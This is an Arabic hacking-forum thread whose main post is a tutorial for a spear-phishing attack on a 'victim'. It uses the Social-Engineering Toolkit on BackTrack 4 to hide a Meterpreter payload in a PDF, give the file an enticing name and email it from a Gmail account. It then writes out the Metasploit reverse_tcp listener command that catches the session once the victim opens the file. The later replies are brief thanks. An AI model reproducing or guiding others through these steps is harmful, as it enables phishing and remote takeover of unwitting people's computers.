منتديات الهكرز المتقدم
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بتسجيل
ما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
كما يشرفنا أن تقوم بالتسجيل
منتديات الهكرز المتقدم
أهلا وسهلا بك زائرنا الكريم، إذا كانت هذه زيارتك الأولى للمنتدى، فيرجى التكرم بتسجيل
ما إذا رغبت بقراءة المواضيع والإطلاع فتفضل بزيارة القسم الذي ترغب أدناه.
كما يشرفنا أن تقوم بالتسجيل
منتديات الهكرز المتقدم
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات الهكرز المتقدم

اتصال بي عبر S corpion
 
الرئيسيةWelcomeأحدث الصورالتسجيلدخول

 

 دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!

اذهب الى الأسفل 
+2
BBC-World
Scorpion
6 مشترك
كاتب الموضوعرسالة
Scorpion
Admin
Admin
Scorpion


عدد المساهمات : 529
نقاط : 3138
السٌّمعَة : 80
تاريخ التسجيل : 15/11/2010
الموقع : www.logsail.c.la

دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Empty
مُساهمةموضوع: دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!   دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Icon_minitimeالأحد مايو 15, 2011 12:47 pm

بسم الله الرحمن الرحيم ..



اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

==================== ========

نرجع لموضوعنا ..

كيف تتم العملية ؟

1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
3-ارسال الملف لبريد الضحية على الانبوكس
4-التنصت و الانتظار حتى يتم الاتصال بالضحية

ماهي الادوات اللازمة للقيام بالعملية ؟


1-Social-Engineering Toolkit
2-Gmail account
3-M3tasploit

طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

كود:
svn co [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] SET/
ملاحظة : يجب ان تكون root ..


الان ندخل على مجلد الاداة بالامر :

كود:
cd SET
من ثم نشغل الادة عن طريق الامر :

كود:
./set
و هذي صورة توضيحية للامرين ..


اشرح لكم الخيارات ..

الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

و الخيارات الباقية للتحديث و صنع بايلودات ..

عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

نختار الخيار الاول بالرقم 1 و نشوف :



مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم




الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter




الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

نضغط انتر لاستكمال العملية و ارسال الملف

بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..



الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6
بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

نحدده و نتبع الخيارات المتبقية ..



بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..


الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟




.. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

طيب الان نتنصت لانتظار الضحية بالامر :

كود:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E

الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !



تم بحمد الله ...

ملاحظة هامة :الشرح المصور ده منقول تم نقلو لكي يتم التدقيق في الاوامر وتم عمل شرح فديو مني لكي نطبق عملي ولكن عمليت الاختراق لن تكتمل لانه تم شرح العملية في الصور وكانت اداة SET قديمة فتم عمل شرح فديو على الجديدة.

تحميل الشرح الفديو :http://arabsh.com/paq2whht53g2.html
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www.logsail.c.la
BBC-World
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 9
نقاط : 10
السٌّمعَة : 1
تاريخ التسجيل : 20/05/2011

دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Empty
مُساهمةموضوع: رد: دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!   دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Icon_minitimeالأربعاء يونيو 08, 2011 7:06 am

درس ممتاز اخي و المزيد من الإحتراف و الدقة
الرجوع الى أعلى الصفحة اذهب الى الأسفل
soon-7
هكر مجتهد
هكر مجتهد
soon-7


عدد المساهمات : 220
نقاط : 1343
السٌّمعَة : 34
تاريخ التسجيل : 17/07/2011

دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Empty
مُساهمةموضوع: رد: دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!   دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Icon_minitimeالإثنين أكتوبر 17, 2011 12:36 am

درس راائع جدا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
firstday
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 16
نقاط : 16
السٌّمعَة : 0
تاريخ التسجيل : 15/06/2012

دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Empty
مُساهمةموضوع: رد: دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!   دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Icon_minitimeالجمعة يونيو 15, 2012 1:55 am

مشكور جزاك الله خير
الرجوع الى أعلى الصفحة اذهب الى الأسفل
abu osama
هكر مبتدئ
هكر مبتدئ
abu osama


عدد المساهمات : 15
نقاط : 15
السٌّمعَة : 0
تاريخ التسجيل : 25/03/2014
العمر : 29

دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Empty
مُساهمةموضوع: رد: دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!   دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Icon_minitimeالخميس مارس 27, 2014 5:16 pm

شكرا اخي
الرجوع الى أعلى الصفحة اذهب الى الأسفل
Zaki_Aks
هكر مبتدئ
هكر مبتدئ



عدد المساهمات : 1
نقاط : 1
السٌّمعَة : 0
تاريخ التسجيل : 19/06/2014

دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Empty
مُساهمةموضوع: رد: دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!   دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!! Icon_minitimeالخميس يونيو 19, 2014 2:23 pm

Crying or Very sad  Razz  Very Happy 
wh
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
دورة احترافية الباك تراك 4 ) الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل *_*...!!!!
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» (دورة احترافية الباك تراك 4 r2) الدرس الثالث بعض اوامر الباك تراك المهمة(1)
» (دورة احترافية الباك تراك ) استخدام الكيلوجر *_^ 100%!!!!
» (دورة احترافية الباك تراك 4 r2) الدرس الرابع فهم الاختصارات
» (دورة احترافية الباك تراك 4 r2) الدرس الاول تثبيت النظام.
» (دورة احترافية الباك تراك 4 ) طريقة عمل سرفر شخصي في النظام .

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الهكرز المتقدم :: قسم خاص باستعمال النظام الخاص بالقراصنة باك تراك BackTrack-
انتقل الى: